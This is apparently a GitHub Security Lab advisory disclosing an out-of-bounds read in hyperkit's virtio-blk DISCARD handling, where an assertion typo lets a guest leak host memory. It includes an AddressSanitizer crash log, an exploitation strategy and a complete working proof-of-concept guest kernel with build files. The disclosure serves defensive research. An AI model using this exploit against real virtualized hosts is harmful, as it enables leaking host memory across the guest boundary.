Coordinated Disclosure Timeline

Summary

A malicious guest can trigger a vulnerability in the host by abusing the disk driver that may lead to the disclosure of the host memory into the virtualized guest.

Product

hyperkit

Tested Version

v0.20210107

Details

Issue 1: VBH_OP_DISCARD assertion turned into assignment (GHSL-2021-058)

The function pci_vtblk_proc handles the arrival of virtio descriptors sent by the guest. These descriptors contain disk I/O operations to be performed by the host on the disk image that contains the operating system. The operation VBH_OP_DISCARD contains a vulnerability that allows an attacker to read memory outside of the guest address space.

On pci_virtio_block.c#L316 it can be seen how an assertion is used to verify the size of the incoming iov data structure. Unfortunately, a typo turns the equality operator into an assignment. In C, assignments return the value assigned so the assert will always be satisfied by any value of iov_len.

Vulnerable call:

	case VBH_OP_DISCARD:
		/* We currently limit the discard to one segment in the initial negotiation
		   so expect exactly one correctly-sized payload descriptor. */
		assert(iov[1].iov_len = sizeof(struct virtio_blk_discard_write_zeroes));
		assert(n == 2);
		vbdiscard = iov[1].iov_base;
		io->io_req.br_offset = (off_t) vbdiscard->sector * DEV_BSIZE;
		io->io_req.br_resid = vbdiscard->num_sectors * DEV_BSIZE;
		err = blockif_delete(sc->bc, &io->io_req);
		break;

By compiling hyperkit with AddressSanitizer the out of bounds access can be seen clearly on the following crash log.

Host crashing:

(lldb) r -s 0:0,hostbridge -s 1,uart -s 4,virtio-blk,disk.img -f multiboot,poc
Process 6867 launched: '/Users/goose/workspace/hyperkit/build/hyperkit.sym' (x86_64)
vmx_set_ctlreg: cap_field: 4 bit: 12 unspecified don't care: bit is 0
vmx_set_ctlreg: cap_field: 4 bit: 20 unspecified don't care: bit is 0
vmx_set_ctlreg: cap_field: 3 bit: 13 unspecified don't care: bit is 0
virtio-block: DISCARD op, 0x00000000 bytes, 1 segs
=================================================================
==6867==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x000114482000 at pc 0x0001000dba06 bp 0x70000d5eb3f0 sp 0x70000d5eb3e8
READ of size 4 at 0x000114482000 thread T3
    #0 0x1000dba05 in pci_vtblk_proc pci_virtio_block.c:322
    #1 0x1000da432 in pci_vtblk_notify pci_virtio_block.c:352
    #2 0x100134191 in vi_pci_write virtio.c:741
    #3 0x1000c6228 in pci_emul_io_handler pci_emul.c:364
    #4 0x100085cf5 in emulate_inout inout.c:243
    #5 0x100149b6a in vmexit_inout hyperkit.c:353
    #6 0x1001495ef in vcpu_loop hyperkit.c:631
    #7 0x1001443f2 in vcpu_thread hyperkit.c:278
    #8 0x7fff2046994f in _pthread_start+0xdf (libsystem_pthread.dylib:x86_64+0x694f)
    #9 0x7fff2046547a in thread_start+0xe (libsystem_pthread.dylib:x86_64+0x247a)

0x000114482000 is located 0 bytes to the right of 268435456-byte region [0x000104482000,0x000114482000)
allocated by thread T0 here:
    #0 0x1005d281f in wrap_valloc+0xaf (libclang_rt.asan_osx_dynamic.dylib:x86_64+0x4681f)
    #1 0x10006d8c6 in vmm_mem_alloc vmm_mem.c:49
    #2 0x1000417df in vm_malloc vmm.c:549
    #3 0x10004c645 in setup_memory_segment vmm_api.c:160
    #4 0x10004c3a9 in xh_vm_setup_memory vmm_api.c:192
    #5 0x100147372 in main hyperkit.c:1442
    #6 0x7fff20484620 in start+0x0 (libdyld.dylib:x86_64+0x15620)

Thread T3 created by T0 here:
    #0 0x1005cc4ba in wrap_pthread_create+0x5a (libclang_rt.asan_osx_dynamic.dylib:x86_64+0x404ba)
    #1 0x100143d4e in vcpu_add hyperkit.c:307
    #2 0x100147a14 in main hyperkit.c:1522
    #3 0x7fff20484620 in start+0x0 (libdyld.dylib:x86_64+0x15620)

SUMMARY: AddressSanitizer: heap-buffer-overflow pci_virtio_block.c:322 in pci_vtblk_proc
Shadow bytes around the buggy address:
  0x1000228903b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000228903c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000228903d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000228903e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000228903f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100022890400:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

Impact

This issue leads to a guest reading memory outside its address space. In order to do so, a malicious guest can use this issue as an oracle, by putting the disk image into a known state and then proceeding to trigger the vulnerability. The VBH_OP_DISCARD operation will use an invalid iov[1].iov_base pointer to fill the virtio_blk_discard_write_zeroes structure with memory beyond the guest’s address space. A carefully crafted iov_base can be made such as the leaked data fills the field num_sectors therefore controlling the amount of sectors to be zeroed out by the discard operation. Now the attacker can read the amount of overwritten bytes the VBH_OP_DISCARD operation wrote.

To make this attack practical (writing an unknown 32 bit number of sectors to the disk can take some time) an attacker can carefully prepare the virtio_blk_discard_write_zeroes structure (by changing the offset of the original iov structure) to be filled with to be leaked data in smaller increments.

The impact of this vulnerability is exacerbated by the fact that in our tests, the guest memory is initialized on a MALLOC_LARGE zone that is located right before, and is contiguous with, a MALLOC_TINY which is prone to heap manipulation from the guest.

In the following snippet, it can be seen that the iov_base pointer falls into the zone 109000000-111000000 and

Address of the pointer on lldb:

p iov[1].iov_base
(void *) $0 = 0x0000000110fffff8

Virtual memory map of the exploited process:_

$ vmmap hyperkit
...
MALLOC_LARGE                109000000-111000000    [128.0M     4K     4K     0K] rw-/rwx SM=ALI          DefaultMallocZone_0x1003d3000
MALLOC_TINY                 111000000-111100000    [ 1024K    12K    12K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
VM_ALLOCATE                 111100000-111280000    [ 1536K  1176K  1176K     0K] rw-/rwx SM=PRV
MALLOC_SMALL                111800000-112000000    [ 8192K    28K    28K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
MALLOC_SMALL                112000000-112800000    [ 8192K    20K    20K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
MALLOC_LARGE                112800000-11a800000    [128.0M  4204K  4204K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
MALLOC_LARGE                11a800000-11a83a000    [  232K    12K    12K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
...

Proof of Concept

The following PoC is a simple multiboot kernel that simulates a compromised guest. The guest must be booted with the device virtio-blk enabled by passing hyperkit the command line flags -s 4,virtio-blk,disk.img for example.

Make sure you compile hyperkit with AddressSanitizer in order to catch the invalid read access.

In order to compile it follow the instructions in the resources section.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static void
outw(uint16_t port, uint16_t value)
{
    __asm__ __volatile__("outw %w0,%w1"
                         :
                         : "a"(value), "Nd"(port));
}

static void
outl(uint16_t port, uint32_t value)
{
    __asm__ __volatile__("outl %0,%w1"
                         :
                         : "a"(value), "Nd"(port));
}

struct __attribute__((packed)) vring_avail
{
    uint16_t va_flags;  /* VRING_AVAIL_F_* */
    uint16_t va_idx;    /* counts to 65535, then cycles */
    uint16_t va_ring[]; /* size N, reported in QNUM value */
};

struct __attribute__((packed)) virtio_desc
{                      /* AKA vring_desc */
    uint64_t vd_addr;  /* guest physical address */
    uint32_t vd_len;   /* length of scatter/gather seg */
    uint16_t vd_flags; /* VRING_F_DESC_* */
    uint16_t vd_next;  /* next desc if F_NEXT */
};

#define VRING_DESC_F_NEXT (1 << 0)
#define VRING_DESC_F_WRITE (1 << 1)
#define VRING_DESC_F_INDIRECT (1 << 2)

#define VRING_AVAIL_F_NO_INTERRUPT 1

struct __attribute__((packed)) virtio_blk_hdr
{
#define VBH_OP_READ 0
#define VBH_OP_WRITE 1
#define VBH_OP_FLUSH 4
#define VBH_OP_FLUSH_OUT 5
#define VBH_OP_IDENT 8
#define VBH_OP_DISCARD 11
#define VBH_OP_WRITE_ZEROES 13
#define VBH_FLAG_BARRIER 0x80000000 /* OR'ed into vbh_type */
    uint32_t vbh_type;
    uint32_t vbh_ioprio;
    uint64_t vbh_sector;
};

void poc()
{
    // 0. Choose an address that is mapped but unused.
    uintptr_t pfn = (uintptr_t)0x1000000;

    // Descriptors.
    struct virtio_desc *desc = (struct virtio_desc *)(pfn);

    // First descriptor.
    struct virtio_blk_hdr *vbh = (struct virtio_blk_hdr *)0x20000;
    vbh->vbh_type = VBH_OP_DISCARD;
    vbh->vbh_ioprio = 0;
    vbh->vbh_sector = 0;

    desc[0].vd_addr = vbh;
    desc[0].vd_len = sizeof(struct virtio_blk_hdr);
    desc[0].vd_next = 1;
    desc[0].vd_flags |= VRING_DESC_F_NEXT;

    // The first 8 bytes correspond to virtio_blk_discard_write_zeroes::sector
    // virtio_blk_discard_write_zeroes::num_sectors will be leaked memory
    uintptr_t addr = 0x10000000 - 8;

    // Second descriptor
    desc[1].vd_addr = addr;
    desc[1].vd_len = 0;
    desc[1].vd_next = 2;
    desc[1].vd_flags |= VRING_DESC_F_NEXT;

    // Third descriptor
    desc[2].vd_addr = 0x4000;
    desc[2].vd_len = 0x1;
    desc[2].vd_flags &= ~VRING_DESC_F_NEXT;
    desc[2].vd_flags |= VRING_DESC_F_WRITE;

    // Available descriptors.
    struct vring_avail *avail = (struct vring_avail *)(pfn + 0x800);

    avail->va_idx = 1;
    avail->va_flags |= VRING_AVAIL_F_NO_INTERRUPT;
    avail->va_ring[0] = 0;

    // 1. Select a queue.
    // VTCFG_R_QSEL = 0x0e
    outw(0x208e, 0);

    // 2. Initialize the queue to our address.
    // VTCFG_R_PFN = 0x08
    outl(0x2088, pfn / 4096);

    // 3. VTCFG_R_QNOTIFY
    outw(0x2080 | 0x10, 0);
}

int kernel_main(void)
{
    poc();
    return 0;
}

Resources

In order to compile each proof of concept code, place the code into a C file in a directory along with the provided files linker.ld and start.s. You will also need to install nasm and i686-elf-gcc:

Compilation:

# Install compilation dependencies.
brew install nasm i686-elf-gcc

# Compile the kernel into a file named `poc`.
nasm -felf32 -w+all -o start.o start.s
i686-elf-gcc -std=c17 -Wall -ffreestanding -O0 -nostdlib -Wno-unused-function -c poc.c -o poc.o
i686-elf-gcc -std=c17 -Wall -ffreestanding -O0 -nostdlib -Wno-unused-function -T linker.ld start.o poc.o -o poc -lgcc

linker.ld

ENTRY(start)
 
SECTIONS
{
    . = 1M;

    .multiboot BLOCK(4K) : ALIGN(4K)
    {
        *(.multiboot)
    }

    .text BLOCK(4K) : ALIGN(4K)
    {
        *(.text)
    }
  
    .data BLOCK(4K) : ALIGN(4K)
    {
        *(.data)
    }
 
    .rodata BLOCK(4K) : ALIGN(4K)
    {
        *(.rodata)
    }

    .bss BLOCK(4K) : ALIGN(4K)
    {
        *(.common)
        *(.bss)
    } 
}

start.s

KERNEL_STACK_SIZE equ 0x4000

[section .multiboot]
    MB_MODULEALIGN  equ  1 << 0
    MB_MEMINFO      equ  1 << 1
    MB_FLAGS        equ  MB_MODULEALIGN | MB_MEMINFO
    MB_MAGIC        equ  0x1BADB002
    MB_CHECKSUM     equ -(MB_MAGIC + MB_FLAGS)

    multiboot_header:
        dd MB_MAGIC
        dd MB_FLAGS
        dd MB_CHECKSUM

[section .text]
    start:
        global start
        lgdt [gdt_temp_r]
        mov eax, 0x10
        mov ds, ax
        mov es, ax
        mov ss, ax
        jmp 0x08:kernel_entry

    kernel_entry:
        mov esp, kernel_stack + KERNEL_STACK_SIZE
        mov ebp, esp
        extern kernel_main
        call kernel_main
        jmp $

[section .data]
    gdt_temp:
        dq 0x0000000000000000
        dq 0x00cf9a000000ffff
        dq 0x00cf92000000ffff

    gdt_temp_end:
    gdt_temp_r:
        dw gdt_temp_end - gdt_temp - 1
        dd gdt_temp

[section .bss]
    align 32
    kernel_stack:
          resb KERNEL_STACK_SIZE

CVE

Credit

This issue was discovered and reported by GHSL team member @agustingianni (Agustin Gianni).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-58 in any communication regarding this issue.